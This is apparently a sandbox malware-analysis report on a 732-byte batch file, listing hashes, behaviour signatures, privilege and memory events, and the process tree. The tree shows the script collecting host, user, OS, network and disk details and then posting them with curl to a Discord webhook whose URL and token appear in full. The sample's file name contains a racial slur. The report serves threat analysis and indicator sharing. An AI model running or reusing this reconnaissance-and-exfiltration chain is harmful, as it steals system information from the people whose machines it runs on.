Analysis

max time kernel:   100s
max time network:  128s
platform:          windows11-21h2_x64
resource:          win11-20250313-en
resource tags:     arch:x64, arch:x86, image:win11-20250313-en, locale:en-us, os:windows11-21h2-x64, system
submitted:         01/04/2025, 14:40
Static task:      static1
Behavioral task:  behavioral1
  Sample:    niggagimeinfo.bat
  Resource:  win10ltsc2021-20250314-en
  10 signatures, 150 seconds
General

Target:  niggagimeinfo.bat
Size:    732B
MD5:     a874910a487c124be0f303e1c626091c
SHA1:    1f160820d42a658baf7b4fa3759847d2acdef6a0
SHA256:  c6c4ab9000f281ecd77ca3a6bc7d1c9844c5d28bb19a8ee416a8c6cc1e597987
SHA512:  df0381058099400a48f1e63f22141d9a0f385a6ab427df4ecc55331f85347a6ebb0d4eecca3491a39496bc91098ef3efffce941f3e03ced308505da565ff9041
Malware Config
Signatures
Hawkeye family

Legitimate hosting services abused for malware hosting/C2  (1 TTPs, 2 IoCs)
  flow  ioc
  1     discord.com
  2     discord.com

Collects information from the system  (1 TTPs, 1 IoCs)
  Uses WMIC.exe to find detailed system information.
  pid   Process
  480   WMIC.exe

Gathers network information  (2 TTPs, 2 IoCs)
  Uses commandline utility to view network configuration.
  pid   Process
  3340  ipconfig.exe
  1072  ipconfig.exe

Gathers system information  (1 TTPs, 1 IoCs)
  Runs systeminfo.exe.
  pid   Process
  5416  systeminfo.exe
Suspicious use of AdjustPrivilegeToken  (43 IoCs)
  description                          pid   Process
  Token: SeDebugPrivilege              1472  whoami.exe
  Token: SeIncreaseQuotaPrivilege      480   WMIC.exe
  Token: SeSecurityPrivilege           480   WMIC.exe
  Token: SeTakeOwnershipPrivilege      480   WMIC.exe
  Token: SeLoadDriverPrivilege         480   WMIC.exe
  Token: SeSystemProfilePrivilege      480   WMIC.exe
  Token: SeSystemtimePrivilege         480   WMIC.exe
  Token: SeProfSingleProcessPrivilege  480   WMIC.exe
  Token: SeIncBasePriorityPrivilege    480   WMIC.exe
  Token: SeCreatePagefilePrivilege     480   WMIC.exe
  Token: SeBackupPrivilege             480   WMIC.exe
  Token: SeRestorePrivilege            480   WMIC.exe
  Token: SeShutdownPrivilege           480   WMIC.exe
  Token: SeDebugPrivilege              480   WMIC.exe
  Token: SeSystemEnvironmentPrivilege  480   WMIC.exe
  Token: SeRemoteShutdownPrivilege     480   WMIC.exe
  Token: SeUndockPrivilege             480   WMIC.exe
  Token: SeManageVolumePrivilege       480   WMIC.exe
  Token: 33                            480   WMIC.exe
  Token: 34                            480   WMIC.exe
  Token: 35                            480   WMIC.exe
  Token: 36                            480   WMIC.exe
  (The 21 WMIC.exe rows are reported a second time, identically, for the same PID 480, which gives the 43 total.)
Suspicious use of WriteProcessMemory  (20 IoCs)
  description                         pid   Process  procid_target
  PID 4948 wrote to memory of 2840    4948  cmd.exe  80
  PID 4948 wrote to memory of 1472    4948  cmd.exe  81
  PID 4948 wrote to memory of 5416    4948  cmd.exe  82
  PID 4948 wrote to memory of 5656    4948  cmd.exe  83
  PID 4948 wrote to memory of 3340    4948  cmd.exe  86
  PID 4948 wrote to memory of 2240    4948  cmd.exe  87
  PID 4948 wrote to memory of 1072    4948  cmd.exe  88
  PID 4948 wrote to memory of 4920    4948  cmd.exe  89
  PID 4948 wrote to memory of 480     4948  cmd.exe  90
  PID 4948 wrote to memory of 3348    4948  cmd.exe  91
  (Each row is reported twice, giving the 20 total. The target PIDs are exactly the child processes cmd.exe spawns in the process tree below, so these writes reflect ordinary child-process setup by the interpreter rather than injection into an unrelated process.)
Processes

C:\Windows\system32\cmd.exe  (PID 4948)
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\niggagimeinfo.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\HOSTNAME.EXE  (PID 2840)
    hostname

  C:\Windows\system32\whoami.exe  (PID 1472)
    whoami
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\systeminfo.exe  (PID 5416)
    systeminfo
    - Gathers system information

  C:\Windows\system32\findstr.exe  (PID 5656)
    findstr /B /C:"OS Name" /C:"OS Version"

  C:\Windows\system32\ipconfig.exe  (PID 3340)
    ipconfig
    - Gathers network information

  C:\Windows\system32\findstr.exe  (PID 2240)
    findstr IPv6

  C:\Windows\system32\ipconfig.exe  (PID 1072)
    ipconfig
    - Gathers network information

  C:\Windows\system32\findstr.exe  (PID 4920)
    findstr IPv4

  C:\Windows\System32\Wbem\WMIC.exe  (PID 480)
    wmic logicaldisk get caption, freespace, size
    - Collects information from the system
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\system32\curl.exe  (PID 3348)
    curl -X POST https://discord.com/api/webhooks/1356637948279394315/wBsP0ldZy-OklbkGSc8jSiZ8Y16MimqHEj7Ln0Ff1INRHzRS024TSAFclzmg8-DVJw_b -H "Content-Type: application/json" -d "{\"content\": \"```\n$(type "C:\Users\Admin\AppData\Local\Temp\sysinfo.txt")\n```\"}"

Each findstr child immediately follows the systeminfo or ipconfig child whose output it filters (OS name and version, then the IPv6 and IPv4 lines), which is how the script builds the collected text. Note that the captured curl command line still contains the literal text $(type "...sysinfo.txt"): cmd.exe does not perform $(...) command substitution, so the JSON body posted to the Discord webhook carries that literal string rather than the contents of sysinfo.txt. The webhook URL itself, with its token, is the actionable IoC.